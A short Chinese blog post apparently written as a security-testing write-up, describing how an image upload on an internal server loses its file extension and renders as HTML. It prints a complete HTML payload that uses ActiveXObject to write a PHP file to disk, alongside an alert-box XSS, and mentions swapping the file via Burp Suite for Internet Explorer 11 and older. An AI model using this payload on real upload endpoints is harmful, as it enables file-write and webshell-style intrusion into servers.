XSS写入一句话

今天测试公司内部服务器,发现一个很有意思的问题,在提交图片时,修改文件类型,导致上传的文件丢失后缀,经过测试,默认解析html。

构造payload-html文件

<!DOCTYPE html>
<html langd="en">
<head>
    <meta charset="UTF-8">
    <title>Security testing</title>
</head>
    <script>
        //获取对象
        var fso = new ActiveXObject("Scripting.FileSystemObject"); 
        //创建文件
        var f=fso.Createtextfile("./a.php",2,true); 
        //写入内容
        f.writeLine("<?php phpinfo();?>"); 
        //关闭流
        f.close(); 
    </script>
<body>
    <h2>This is a friendly interface</h2>
    <script>alert("Welcome to")</script>
</body>
</html>

传输img替换成html文件

burpsuite

浏览器测试IE<=11,环境中为img,不解析php文件,思路大致这样。


本文由 秋边丶 创作,采用 知识共享署名 3.0,可自由转载、引用,但需署名作者且注明文章出处。

还不快抢沙发

添加新评论